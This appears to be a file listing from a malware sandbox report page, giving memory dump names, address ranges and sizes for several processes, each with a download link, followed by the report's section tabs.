memory/4052-39-0x00000000065E0000-0x0000000006612000-memory.dmp

Filesize
200KB

Download
memory/4052-40-0x00000000705F0000-0x000000007063C000-memory.dmp

Filesize
304KB

Download
memory/4052-50-0x0000000006570000-0x000000000658E000-memory.dmp

Filesize
120KB

Download
memory/4052-51-0x0000000007200000-0x00000000072A3000-memory.dmp

Filesize
652KB

Download
memory/4052-52-0x00000000073B0000-0x00000000073BA000-memory.dmp

Filesize
40KB

Download
memory/4052-53-0x00000000075E0000-0x0000000007676000-memory.dmp

Filesize
600KB

Download
memory/4052-54-0x0000000007550000-0x0000000007561000-memory.dmp

Filesize
68KB

Download
memory/4200-176-0x00000000705F0000-0x000000007063C000-memory.dmp

Filesize
304KB

Download
memory/4528-25-0x0000000006A10000-0x0000000006A2A000-memory.dmp

Filesize
104KB

Download
memory/4528-8-0x00000000747D0000-0x0000000074F80000-memory.dmp

Filesize
7.7MB

Download
memory/4528-75-0x00000000747D0000-0x0000000074F80000-memory.dmp

Filesize
7.7MB

Download
memory/4528-4-0x00000000747DE000-0x00000000747DF000-memory.dmp

Filesize
4KB

Download
memory/4528-5-0x0000000004FB0000-0x0000000004FE6000-memory.dmp

Filesize
216KB

Download
memory/4528-27-0x0000000007700000-0x000000000780A000-memory.dmp

Filesize
1.0MB

Download
memory/4528-6-0x0000000005620000-0x0000000005C48000-memory.dmp

Filesize
6.2MB

Download
memory/4528-28-0x000000000B8D0000-0x000000000BE74000-memory.dmp

Filesize
5.6MB

Download
memory/4528-7-0x00000000747D0000-0x0000000074F80000-memory.dmp

Filesize
7.7MB

Download
memory/4528-9-0x0000000005CB0000-0x0000000005CD2000-memory.dmp

Filesize
136KB

Download
memory/4528-26-0x0000000002E50000-0x0000000002E58000-memory.dmp

Filesize
32KB

Download
memory/4528-24-0x0000000007CA0000-0x000000000831A000-memory.dmp

Filesize
6.5MB

Download
memory/4528-23-0x0000000006490000-0x00000000064DC000-memory.dmp

Filesize
304KB

Download
memory/4528-22-0x0000000006460000-0x000000000647E000-memory.dmp

Filesize
120KB

Download
memory/4528-17-0x0000000005F30000-0x0000000006284000-memory.dmp

Filesize
3.3MB

Download
memory/4528-10-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/4528-11-0x0000000005DC0000-0x0000000005E26000-memory.dmp

Filesize
408KB

Download
memory/4864-162-0x00000000074A0000-0x0000000007543000-memory.dmp

Filesize
652KB

Download
memory/4864-164-0x00000000077E0000-0x00000000077F4000-memory.dmp

Filesize
80KB

Download
memory/4864-163-0x00000000077A0000-0x00000000077B1000-memory.dmp

Filesize
68KB

Download
memory/4864-152-0x00000000705F0000-0x000000007063C000-memory.dmp

Filesize
304KB

Download
memory/4908-79-0x0000000007AF0000-0x0000000007B8C000-memory.dmp

Filesize
624KB

Download
memory/4908-190-0x000000000B980000-0x000000000BA12000-memory.dmp

Filesize
584KB

Download
memory/4908-191-0x000000000B960000-0x000000000B96A000-memory.dmp

Filesize
40KB

Download
memory/4908-193-0x000000000B6C0000-0x000000000B6CC000-memory.dmp

Filesize
48KB

Download
memory/4908-78-0x0000000007A30000-0x0000000007A4A000-memory.dmp

Filesize
104KB

Download
memory/4908-205-0x000000000D290000-0x000000000D3AE000-memory.dmp

Filesize
1.1MB

Download
memory/4980-92-0x0000000008870000-0x00000000088A8000-memory.dmp

Filesize
224KB

Download
memory/4980-91-0x0000000007F20000-0x0000000007F28000-memory.dmp

Filesize
32KB

Download
memory/4980-141-0x000000000A360000-0x000000000A4E6000-memory.dmp

Filesize
1.5MB

Download
memory/4980-93-0x0000000008830000-0x000000000883E000-memory.dmp

Filesize
56KB

Download
memory/4980-90-0x0000000000990000-0x0000000000A62000-memory.dmp

Filesize
840KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads